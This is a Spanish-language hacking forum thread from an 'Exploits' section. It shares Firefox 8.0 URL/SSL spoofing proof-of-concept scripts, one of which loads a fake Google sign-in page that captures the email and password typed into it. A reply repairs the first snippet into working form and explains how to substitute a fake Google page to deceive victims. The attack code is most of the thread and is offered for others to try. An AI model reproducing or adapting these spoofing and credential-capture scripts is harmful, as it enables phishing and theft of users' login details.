Prueben y comenten:


mozilla 8.0 (URL & SSL Spoofing):


function gotogo(){
setTimeout("document.location.href='[Enlace externo eliminado para invitados]);
setTimeout("history.back();",100);
}
</script>

<a href="[Enlace externo eliminado para invitados]" onclick="gotogo();">clickme and forward me</a>


mozilla 8.0-2 (Advanced URL & SSL Spoofing/Remote code execution):

<body>
<script>
var targetUrl = "[Enlace externo eliminado para invitados]";
var dataUrl1 = "data:text/html," + encodeURIComponent(<><![CDATA[
<a href="javascript:opener.b(window)">Click me (open google)</a>
]]></>.toString());

var dataUrl2 = "data:text/html," + encodeURIComponent(<><![CDATA[
<body onload="document.getElementById('Email').focus()">
<script>
function c() {
var e = document.getElementById("Email");
var p = document.getElementById("Passwd");
if (!e.value && !p.value) return;
var s = "Email: " + e.value + "\nPassword: " + p.value;
s += "\n\nAn attacker can send this information to the attacker's server.";
alert(s);
}
<]]><![CDATA[/script>
<pre>
<strong>Sign in</strong>
<form onsubmit="c(); return false" action="javascript:">
<label>Email
<input type="text" id="Email">
</label>
<label>Password
<input type="password" id="Passwd">
</label>
<input type="submit" value="Sign in">
</form>
</pre>
</body>
]]></>.toString());
var dataUrl3 = "data:text/html," + encodeURIComponent(<>
<style><![CDATA[
* {
padding: 0px;
margin: 0px;
}
iframe {
border: none;
width: 100%;
height: 100%;
}
]]></style>
<iframe src={dataUrl2}></iframe>
</>.toString());

function a() {
open(dataUrl1);
}

function b(w) {
w.onblur = function() {
w.onblur = null;
w.alert(1);
var w2 = open(targetUrl);
w2.onunload = function() {
setTimeout(function() {
w2.location = dataUrl3;
w2.close();
}, 0);
};
};
w.close();
}
</script>

<pre>
Steps to reproduce:
1. <a href="javascript:a()">Click me</a> to open a new tab.
2. In the new tab, click a link.
3. A fake page is loaded.
</pre>
</body>
Siempre por aqui
KHC escribió:Lindo! Ya habia escuchado sobre el pero, no habia revisado! =D
vos que sos un mago en este tema, comenta luego que tal..
gracias
Siempre por aqui
Evidentemente el primer code funcionaría si lo hubieses probado antes de postearlo, o es algún método anti noobs?

no es funcional el code, sobra el punto y coma de los primeros parametros de los 2 setTimeout y falta cerrar la ' en el primer parametro del setTimeout además de la apertura del script quedando asi funcional

Código: Seleccionar todo

<script>
function gotogo(){
setTimeout("document.location.href='http://www.yahoo.com/'",100);
setTimeout("history.back()",100);
}
</script>

<a href="http://www.google.com/" onclick="gotogo();">clickme and forward me</a>
NyxKazuya escribió:O.o como uso eso?

PD: perdona pero no se mucho de este tema pero podrias explicarmelo Brevemente!
NyxKazuya cuando pases el raton por encima aparecerá debajo en la barra de estado, la direccion a la que supuestamente vas a ir pero al llamar al método onclick="gotogo();" pasado 100 milisegundos iras a yahoo, recuerda abrirlo con firefox.

ahora en vez de ir a yahoo te creas un fake de google y lo sustituyes por yahoo.

Salu2!
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

@MichBukana, esto es mas que tipico desde exploit-db hasta m1lw0rm 1nj3ct0r y demas teams. Suelen poner codigos con errores por que la gente que no suele ser capaz nisiquiera de leerlos y entenderlos no los usa! Asi de sencillo! Y creo que eso se debe de respetar por que el autor asi lo decidio! Es anti-kiddos! =D Saludos hermano!
1337 & culture!
KHC escribió:@MichBukana, esto es mas que tipico desde exploit-db hasta m1lw0rm 1nj3ct0r y demas teams. Suelen poner codigos con errores por que la gente que no suele ser capaz nisiquiera de leerlos y entenderlos no los usa! Asi de sencillo! Y creo que eso se debe de respetar por que el autor asi lo decidio! Es anti-kiddos! =D Saludos hermano!
Bueno bro te puedo dar parte de la razón, es decisión de esos teams que dejen el codigo incompleto. Pero bro, no estamos ni en exploit-db ni m1lworn ni 1nj3ct0r, y no veo bien postear por postear y menos sin haberse ni si quiera probado antes. habrá gente que no sepa de JavaScript tal vez si de ASM el caso es que hay que hechar una mano a los nuevos por que 'Seguridad informática' esta muerto y cae algun post nuevo cada 5 dias minimo.

¿No estas de acuerdo?

Salu2!
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

Si en eso tienes razon! Vamos a meterle un poco a la zona y ayudar hasta cierto punto a la comunidad! Saludos hermano!
1337 & culture!
MichBukana escribió:
KHC escribió:@MichBukana, esto es mas que tipico desde exploit-db hasta m1lw0rm 1nj3ct0r y demas teams. Suelen poner codigos con errores por que la gente que no suele ser capaz nisiquiera de leerlos y entenderlos no los usa! Asi de sencillo! Y creo que eso se debe de respetar por que el autor asi lo decidio! Es anti-kiddos! =D Saludos hermano!
Bueno bro te puedo dar parte de la razón, es decisión de esos teams que dejen el codigo incompleto. Pero bro, no estamos ni en exploit-db ni m1lworn ni 1nj3ct0r, y no veo bien postear por postear y menos sin haberse ni si quiera probado antes. habrá gente que no sepa de JavaScript tal vez si de ASM el caso es que hay que hechar una mano a los nuevos por que 'Seguridad informática' esta muerto y cae algun post nuevo cada 5 dias minimo.

¿No estas de acuerdo?

Salu2!
No rezongues lo importante es compartir, lamento no tener conocimientos suficientes para verificar su funcionalidad.. pero para eso estan ustedes que son los capos en esto.
Yo pense que era funcional.
Ojala les haya servido.
saludos y a las ordenes.
Siempre por aqui
Responder

Volver a “Exploits”